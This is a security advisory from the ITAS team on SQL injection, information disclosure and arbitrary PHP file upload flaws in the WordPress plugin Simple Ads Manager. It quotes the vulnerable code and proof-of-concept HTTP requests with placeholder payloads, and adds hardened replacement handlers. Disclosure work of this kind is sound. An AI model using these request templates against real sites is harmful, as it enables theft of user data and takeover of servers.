ITAS Team found out multiple critical vulnerabilities in Hakin9 IT Security Magazine

For the second time in two years, the ITAS Security Team has discovered vulnerabilities on the Hakin9 Magazine platform and informed its administrators of the risks. As a token of appreciation, Hakin9 has awarded the ITAS Team a lifetime subscription to the Magazine.

Established in 2005 by Software Media LLC (Poland), Hakin9 is the English version of a world-renowned magazine on web security issues. The Magazine offers the latest news and information on hackers' attacks and methods, as well as solutions to protect systems, networks and applications. Software Media LLC also owns 5 other well-established publications: Hakin9 Magazine, Pentest Magazine, eForensics Magazine, Software Developer's Journal, Hadoop Magazine and Java Magazine, all of them known to and respected by the security community worldwide.

According to Hakin9, the magazine has a database of 100,000 security specialists. All of them, therefore, have been at risk of having sensitive personal information (such as email addresses and passwords) disclosed.

“Hakin9 is the biggest IT security magazine in the world, published for 10 years. We have a database of 100 000 IT security specialists.

Hakin9 magazine provides online visitors the exact information they need to stay up to date with the latest IT Security news and solutions and to learn what they can find on Hakin9's pages. Our website is to help IT Security experts find out what new techniques and tools the hackers and crackers use and what we have prepared for you in the current issue.

It covers techniques of breaking into computer systems, defense and protection methods. Our magazine is useful for everyone interested in securing and hacking – both professionals (security officers, system administrators) and hobbyists.” (HAKIN9 Facebook).

Hakin9's websites are all built on the WordPress platform, a user-friendly and very popular CMS with free and paid plugins and themes. However, these plugins can introduce severe vulnerabilities if they are not rigorously checked before being put to use.

In their research, the ITAS Security Team found a number of vulnerabilities caused by the plugin "Simple Ads Manager" on hakin9.org, pentestmag.com and eforensicsmag.com. The vulnerabilities include information disclosure, SQL injection and arbitrary file upload, which attackers could exploit to steal sensitive information from the entire website or, worse, to execute malicious code on the server or take it over.

The ITAS Team has attempted several times to contact the plugin's developers via the wordpress.org forums and the developers' own website, without success. With some 20,000 active installations of the plugin, the number of websites exposed to severe risk by it is substantial.

1. Disclosing sensitive information (CVE-2015-2826)

Vulnerable versions: 2.5.94, 2.5.96
The file wp-content/plugins/simple-ads-manager/sam-ajax.php exposes many actions (load_users, load_authors, load_cats, load_tags, load_posts, posts_debug, load_stats, ...) that inadvertently reveal users' sensitive information stored in the database, such as username, email and user role.

POC:
+ REQUEST
POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 17

action=load_users

2. SQL injection (CVE-2015-2824)

SQL Injection 1

Code: vulnerable file simple-ads-manager/sam-ajax.php, lines 109 to 128

case 'sam_ajax_sam_hits':
    if(isset($_POST['hits']) && is_array($_POST['hits'])) {
        $hits = $_POST['hits'];
        $values = '';
        $remoteAddr = $_SERVER['REMOTE_ADDR'];
        foreach($hits as $hit) {
            // $hit[0] and $hit[1] are taken from the request and interpolated unescaped
            $values .= ((empty($values)) ? '' : ', ') . "({$hit[1]}, {$hit[0]}, NOW(), 0, '{$remoteAddr}')";
        }
        $sql = "INSERT INTO $sTable (id, pid, event_time, event_type, remote_addr) VALUES {$values};";
        $result = $wpdb->query($sql);
        if($result > 0) echo json_encode(array('success' => true, 'sql' => $sql, 'addr' => $_SERVER['REMOTE_ADDR']));
        else echo json_encode(array(
            'success' => false,
            'result' => $result,
            'sql' => $sql,
            'hits' => $hits,
            'values' => $values
        ));
    }
    break;

POC:
POST /wp-content/plugins/simple-ads-manager/sam-ajax.php HTTP/1.1
Host: target.com
X-Requested-With: XMLHttpRequest
Content-Length: 103

action=sam_hits&hits[0][]=[SQL INJECTION HERE]&hits[1][]=[SQL INJECTION HERE]&level=3
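A hardened replacement for this handler, added here as an example (it is not the plugin's code): every hit is validated as a pair of integers and the multi-row INSERT is built from $wpdb->prepare() placeholders. The hook names and the statistics table name are assumptions.

```php
<?php
// Added example, not the plugin's code: a hardened replacement for the
// 'sam_ajax_sam_hits' branch above. Assumed: it is registered with
// add_action('wp_ajax_sam_hits', ...) and add_action('wp_ajax_nopriv_sam_hits', ...)
// because hit counting runs for anonymous visitors; the table name is assumed.
function sam_hits_hardened() {
    global $wpdb;
    $sTable = $wpdb->prefix . 'sam_stats'; // assumed statistics table
    if ( ! isset( $_POST['hits'] ) || ! is_array( $_POST['hits'] ) ) {
        wp_send_json_error( array( 'reason' => 'missing hits' ) );
    }

    // Each hit must be a pair of non-negative integers; anything else is
    // rejected instead of being concatenated into the statement.
    $rows = array();
    foreach ( $_POST['hits'] as $hit ) {
        if ( ! is_array( $hit ) || ! isset( $hit[0], $hit[1] )
             || ! is_scalar( $hit[0] ) || ! is_scalar( $hit[1] )
             || ! ctype_digit( (string) $hit[0] ) || ! ctype_digit( (string) $hit[1] ) ) {
            wp_send_json_error( array( 'reason' => 'malformed hit' ) );
        }
        $rows[] = array( (int) $hit[1], (int) $hit[0] );
    }
    if ( empty( $rows ) || count( $rows ) > 100 ) { // bound the batch size
        wp_send_json_error( array( 'reason' => 'bad batch size' ) );
    }

    // One "(%d, %d, NOW(), 0, %s)" group per row; $wpdb->prepare() binds the
    // values, so the SQL text itself never contains request data.
    $placeholders = array();
    $args = array();
    foreach ( $rows as $row ) {
        $placeholders[] = '(%d, %d, NOW(), 0, %s)';
        $args[] = $row[0];
        $args[] = $row[1];
        $args[] = $_SERVER['REMOTE_ADDR'];
    }
    $sql = "INSERT INTO {$sTable} (id, pid, event_time, event_type, remote_addr) VALUES "
         . implode( ', ', $placeholders );
    $result = $wpdb->query( $wpdb->prepare( $sql, $args ) );

    // Unlike the original, never echo the SQL text or the raw input back:
    // that leaked table names and query structure to the caller on failure.
    if ( $result > 0 ) {
        wp_send_json_success();
    }
    wp_send_json_error();
}
```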

SQL Injection 2

Code: vulnerable file simple-ads-manager/sam-ajax-admin.php, lines 127 to 168

case 'sam_ajax_load_posts':
    $custs = (isset($_REQUEST['cstr'])) ? $_REQUEST['cstr'] : '';
    $sPost = (isset($_REQUEST['sp'])) ? urldecode( $_REQUEST['sp'] ) : 'Post';
    $sPage = (isset($_REQUEST['spg'])) ? urldecode( $_REQUEST['spg'] ) : 'Page';
    //set @row_num = 0;
    //SELECT @row_num := @row_num + 1 AS recid
    // $custs comes straight from the request and is interpolated into the query unescaped
    $sql = "SELECT
        wp.id,
        wp.post_title AS title,
        wp.post_type AS type
      FROM
        $postTable wp
      WHERE
        wp.post_status = 'publish' AND
        FIND_IN_SET(wp.post_type, 'post,page{$custs}')
      ORDER BY wp.id;";
    $posts = $wpdb->get_results($sql, ARRAY_A);
    $k = 0;
    foreach($posts as &$val) {
        switch($val['type']) {
            case 'post':
                $val['type'] = $sPost;
                break;
            case 'page':
                $val['type'] = $sPage;
                break;
            default:
                $val['type'] = $sPost . ': '.$val['type'];
                break;
        }
        $k++;
        $val['recid'] = $k;
    }
    $out = array(
        'status' => 'success',
        'total' => count($posts),
        'records' => $posts
    );
    break;

POC:
POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

action=load_posts&cstr==[SQL INJECTION HERE]&sp=Post&spg=Page
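A hardened replacement for this handler, added here as an example (it is not the plugin's code): access is restricted, and the comma-separated cstr list is reduced to registered post types and bound through placeholders instead of being spliced into FIND_IN_SET(). The hook name, nonce action and capability are assumptions.

```php
<?php
// Added example, not the plugin's code: a hardened replacement for the
// 'sam_ajax_load_posts' branch above. Assumed: registered with
// add_action('wp_ajax_sam_load_posts', ...); the nonce action name 'sam_admin'
// and the capability are choices for this example.
function sam_load_posts_hardened() {
    global $wpdb;
    // Admin-only data: require a capability and a nonce from the plugin's admin page.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'reason' => 'forbidden' ), 403 );
    }
    check_ajax_referer( 'sam_admin', 'nonce' );

    $sPost = isset( $_REQUEST['sp'] )  ? sanitize_text_field( wp_unslash( $_REQUEST['sp'] ) )  : 'Post';
    $sPage = isset( $_REQUEST['spg'] ) ? sanitize_text_field( wp_unslash( $_REQUEST['spg'] ) ) : 'Page';

    // The original spliced "cstr" into FIND_IN_SET() as-is. Here the comma
    // separated list is split and each entry must name a registered post type.
    $types = array( 'post', 'page' );
    if ( isset( $_REQUEST['cstr'] ) && is_string( $_REQUEST['cstr'] ) ) {
        $registered = get_post_types( array(), 'names' );
        foreach ( explode( ',', $_REQUEST['cstr'] ) as $type ) {
            $type = trim( $type );
            if ( '' !== $type && isset( $registered[ $type ] ) ) {
                $types[] = $type;
            }
        }
    }
    $types = array_values( array_unique( $types ) );

    // One %s placeholder per allowed type: the IN () list is built from
    // placeholders, never from the request string.
    $in  = implode( ', ', array_fill( 0, count( $types ), '%s' ) );
    $sql = "SELECT wp.id, wp.post_title AS title, wp.post_type AS type
            FROM {$wpdb->posts} wp
            WHERE wp.post_status = 'publish' AND wp.post_type IN ({$in})
            ORDER BY wp.id";
    $posts = $wpdb->get_results( $wpdb->prepare( $sql, $types ), ARRAY_A );
    $labels = array( 'post' => $sPost, 'page' => $sPage );
    $k = 0;
    foreach ( $posts as &$val ) {
        $val['type']  = isset( $labels[ $val['type'] ] ) ? $labels[ $val['type'] ] : $sPost . ': ' . $val['type'];
        $val['recid'] = ++$k;
    }
    unset( $val );

    wp_send_json( array( 'status' => 'success', 'total' => count( $posts ), 'records' => $posts ) );
}
```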

Demonstration video

SQL Injection 3

Code: vulnerable file simple-ads-manager/sam-ajax-admin.php, lines 225 to 255

case 'sam_ajax_load_combo_data':
    $page = $_GET['page'];
    $rows = $_GET['rows'];
    $searchTerm = $_GET['searchTerm'];
    $offset = ((int)$page - 1) * (int)$rows;
    // $searchTerm (and the uncast $rows in LIMIT) are interpolated into the query unescaped
    $sql = "SELECT
        wu.id,
        wu.display_name AS title,
        wu.user_nicename AS slug,
        wu.user_email AS email
      FROM
        $uTable wu
      WHERE wu.user_nicename LIKE '{$searchTerm}%'
      ORDER BY wu.id
      LIMIT $offset, $rows;";
    $users = $wpdb->get_results($sql, ARRAY_A);
    $sql = "SELECT COUNT(*) FROM $uTable wu WHERE wu.user_nicename LIKE '{$searchTerm}%';";
    $rTotal = $wpdb->get_var($sql);
    $total = ceil((int)$rTotal/(int)$rows);
    $out = array(
        'page' => $page,
        'records' => count($users),
        'rows' => $users,
        'total' => $total,
        'offset' => $offset
    );
    break;

POC:
POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php?searchTerm=[SQL INJECTION HERE] HTTP/1.1
Host: target.com

action=load_combo_data
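A hardened replacement for this handler, added here as an example (it is not the plugin's code): the search term is escaped for LIKE and bound as a string, the paging values are bounded integers bound as %d, and the email column is no longer returned. The hook name, nonce action and capability are assumptions.

```php
<?php
// Added example, not the plugin's code: a hardened replacement for the
// 'sam_ajax_load_combo_data' branch above. Assumed: registered with
// add_action('wp_ajax_sam_load_combo_data', ...) and the admin page sends a
// nonce created with wp_create_nonce('sam_admin') in the 'nonce' parameter.
function sam_load_combo_data_hardened() {
    global $wpdb;

    if ( ! current_user_can( 'list_users' ) ) {
        wp_send_json_error( array( 'reason' => 'forbidden' ), 403 );
    }
    check_ajax_referer( 'sam_admin', 'nonce' );

    // Paging values become bounded integers, so LIMIT never sees raw input.
    $page   = isset( $_GET['page'] ) ? max( 1, absint( $_GET['page'] ) ) : 1;
    $rows   = isset( $_GET['rows'] ) ? min( 100, max( 1, absint( $_GET['rows'] ) ) ) : 20;
    $offset = ( $page - 1 ) * $rows;

    // For a LIKE prefix match the term is passed through esc_like() first (so a
    // literal % or _ in it does not act as a wildcard) and then bound with %s.
    $term    = isset( $_GET['searchTerm'] ) ? sanitize_text_field( wp_unslash( $_GET['searchTerm'] ) ) : '';
    $pattern = $wpdb->esc_like( $term ) . '%';

    $users = $wpdb->get_results( $wpdb->prepare(
        "SELECT wu.id, wu.display_name AS title, wu.user_nicename AS slug
         FROM {$wpdb->users} wu
         WHERE wu.user_nicename LIKE %s
         ORDER BY wu.id
         LIMIT %d, %d",
        $pattern, $offset, $rows
    ), ARRAY_A );

    $rTotal = (int) $wpdb->get_var( $wpdb->prepare(
        "SELECT COUNT(*) FROM {$wpdb->users} wu WHERE wu.user_nicename LIKE %s",
        $pattern
    ) );

    // user_email is deliberately left out: the combo box only needs a label and
    // a slug, while the original returned every matching address to the browser.
    wp_send_json( array(
        'page'    => $page,
        'records' => count( $users ),
        'rows'    => $users,
        'total'   => (int) ceil( $rTotal / $rows ),
        'offset'  => $offset,
    ) );
}
```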

SQL Injection 4

Code: vulnerable file simple-ads-manager/sam-ajax-admin.php, lines 188 to 223

case 'sam_ajax_load_users':
    $roleSubscriber = (isset($_REQUEST['subscriber'])) ? urldecode($_REQUEST['subscriber']) : 'Subscriber';
    $roleContributor = (isset($_REQUEST['contributor'])) ? urldecode($_REQUEST['contributor']) : 'Contributor';
    $roleAuthor = (isset($_REQUEST['author'])) ? urldecode($_REQUEST['author']) : 'Author';
    $roleEditor = (isset($_REQUEST['editor'])) ? urldecode($_REQUEST['editor']) : 'Editor';
    $roleAdministrator = (isset($_REQUEST["admin"])) ? urldecode($_REQUEST["admin"]) : 'Administrator';
    $roleSuperAdmin = (isset($_REQUEST['sadmin'])) ? urldecode($_REQUEST['sadmin']) : 'Super Admin';
    // all six role labels are request-controlled and placed inside SQL string literals unescaped
    $sql = "SELECT
        wu.id,
        wu.display_name AS title,
        wu.user_nicename AS slug,
        (CASE wum.meta_value
          WHEN 0 THEN '$roleSubscriber'
          WHEN 1 THEN '$roleContributor'
          WHEN 2 THEN '$roleAuthor'
          ELSE
            IF(wum.meta_value > 2 AND wum.meta_value <= 7, '$roleEditor',
              IF(wum.meta_value > 7 AND wum.meta_value <= 10, '$roleAdministrator',
                IF(wum.meta_value > 10, '$roleSuperAdmin', NULL)
              )
            )
        END) AS role
      FROM $uTable wu
      INNER JOIN $umTable wum
        ON wu.id = wum.user_id AND wum.meta_key = '$userLevel'
      ORDER BY wu.id;";
    $users = $wpdb->get_results($sql, ARRAY_A);
    $k = 0;
    foreach($users as &$val) {
        $k++;
        $val['recid'] = $k;
    }
    $out = $users;
    break;

POC:
POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

action=load_users&subscriber=[SQL INJECTION HERE]&contributor=[SQL INJECTION HERE]&author=[SQL INJECTION HERE]&editor=[SQL INJECTION HERE]&admin=[SQL INJECTION HERE]&sadmin=[SQL INJECTION HERE]
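A hardened replacement for this handler, added here as an example (it is not the plugin's code). It also covers the information disclosure in section 1, since the same load_users action was answering unauthenticated requests: the capability and nonce checks come first, and the six role labels are bound as %s parameters. The hook name, nonce action, capability and the meta key behind $userLevel are assumptions.

```php
<?php
// Added example, not the plugin's code: a hardened replacement for the
// 'sam_ajax_load_users' branch above. The same action is the one behind the
// information disclosure in section 1, so the first fix is the access check.
// Assumed: registered with add_action('wp_ajax_sam_load_users', ...), nonce
// action name 'sam_admin', and that $userLevel is the wp_user_level meta key.
function sam_load_users_hardened() {
    global $wpdb;
    // Without this, any visitor could pull the user list (section 1).
    if ( ! current_user_can( 'list_users' ) ) {
        wp_send_json_error( array( 'reason' => 'forbidden' ), 403 );
    }
    check_ajax_referer( 'sam_admin', 'nonce' );

    // Role labels are display strings from the admin page; they are sanitized
    // and bound with %s instead of being quoted into the SQL by hand.
    $defaults = array(
        'subscriber' => 'Subscriber', 'contributor' => 'Contributor', 'author' => 'Author',
        'editor'     => 'Editor',     'admin'       => 'Administrator', 'sadmin' => 'Super Admin',
    );
    $labels = array();
    foreach ( $defaults as $key => $default ) {
        $labels[] = isset( $_REQUEST[ $key ] )
            ? sanitize_text_field( wp_unslash( $_REQUEST[ $key ] ) ) : $default;
    }
    $labels[] = $wpdb->prefix . 'user_level'; // meta_key, bound as the last %s

    $sql = "SELECT wu.id, wu.display_name AS title, wu.user_nicename AS slug,
              (CASE wum.meta_value
                 WHEN 0 THEN %s
                 WHEN 1 THEN %s
                 WHEN 2 THEN %s
                 ELSE IF(wum.meta_value > 2 AND wum.meta_value <= 7, %s,
                      IF(wum.meta_value > 7 AND wum.meta_value <= 10, %s,
                      IF(wum.meta_value > 10, %s, NULL)))
               END) AS role
            FROM {$wpdb->users} wu
            INNER JOIN {$wpdb->usermeta} wum
              ON wu.id = wum.user_id AND wum.meta_key = %s
            ORDER BY wu.id";
    $users = $wpdb->get_results( $wpdb->prepare( $sql, $labels ), ARRAY_A );
    $k = 0;
    foreach ( $users as &$val ) {
        $val['recid'] = ++$k;
    }
    unset( $val );
    wp_send_json( $users );
}
```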

3. Uploading files with malicious code (CVE-2015-2825)

In version 2.5.94, the file /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php contains a vulnerable upload function (removed in version 2.5.96) that attackers could exploit to upload malicious code to the web server.

Code: vulnerable file simple-ads-manager/sam-ajax-admin.php, lines 303 to 314

case 'sam_ajax_upload_ad_image':
    if(isset($_POST['path'])) {
        // both the destination directory and the file name come from the request;
        // no authentication, extension or content check is performed
        $uploadDir = $_POST['path'];
        $file = $uploadDir . basename($_FILES['uploadfile']['name']);
        if ( move_uploaded_file( $_FILES['uploadfile']['tmp_name'], $file )) {
            $out = array('status' => "success");
        } else {
            $out = array('status' => "error");
        }
    }
    break;

POC:
POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
Host: target.com
Content-Type: multipart/form-data; boundary=---------------------------10898951822009525
Content-Length: 683

-----------------------------10898951822009525
Content-Disposition: form-data; name="uploadfile"; filename="info.php"
Content-Type: application/x-php

[CODE PHP HERE]
-----------------------------10898951822009525
Content-Disposition: form-data; name="action"

upload_ad_image
-----------------------------10898951822009525--
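A hardened replacement for this handler, added here as an example (it is not the plugin's code): the caller must be an authenticated user with upload rights, the destination path is no longer taken from the request, and WordPress's own upload handling restricts the file to a few image types and verifies that the stored file really is an image. The hook name and nonce action are assumptions.

```php
<?php
// Added example, not the plugin's code: a hardened replacement for the
// 'sam_ajax_upload_ad_image' branch above. Assumed: registered with
// add_action('wp_ajax_sam_upload_ad_image', ...) and a nonce action named 'sam_admin'.
function sam_upload_ad_image_hardened() {
    // The original accepted uploads from anyone; require an upload-capable user and a nonce.
    if ( ! current_user_can( 'upload_files' ) ) {
        wp_send_json_error( array( 'status' => 'error', 'reason' => 'forbidden' ), 403 );
    }
    check_ajax_referer( 'sam_admin', 'nonce' );

    if ( empty( $_FILES['uploadfile']['tmp_name'] ) || ! is_uploaded_file( $_FILES['uploadfile']['tmp_name'] ) ) {
        wp_send_json_error( array( 'status' => 'error', 'reason' => 'no file' ) );
    }

    // The destination is never taken from the request ($_POST['path'] in the
    // original). wp_handle_upload() stores the file under the uploads directory
    // with a sanitized, de-duplicated name and rejects anything whose extension
    // and detected MIME type are not in the list below, so info.php is refused.
    require_once ABSPATH . 'wp-admin/includes/file.php';
    $overrides = array(
        'test_form' => false,
        'mimes'     => array(
            'jpg|jpeg' => 'image/jpeg',
            'png'      => 'image/png',
            'gif'      => 'image/gif',
        ),
    );
    $result = wp_handle_upload( $_FILES['uploadfile'], $overrides );
    if ( isset( $result['error'] ) ) {
        wp_send_json_error( array( 'status' => 'error', 'reason' => $result['error'] ) );
    }

    // Second opinion on the content: the stored file must decode as an image.
    if ( false === @getimagesize( $result['file'] ) ) {
        unlink( $result['file'] );
        wp_send_json_error( array( 'status' => 'error', 'reason' => 'not an image' ) );
    }

    wp_send_json_success( array( 'status' => 'success', 'url' => $result['url'] ) );
}
```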

Demonstration video

Warning: Websites currently using the Simple Ads Manager plugin should remove it immediately to avoid possible attacks, and should only reinstall it once the developers have fixed the vulnerabilities.

Trần Đình Tiến (tien.d.tran@itas.vn), Lê Ngọc Phi (phi.n.le@itas.vn) and ITAS Team
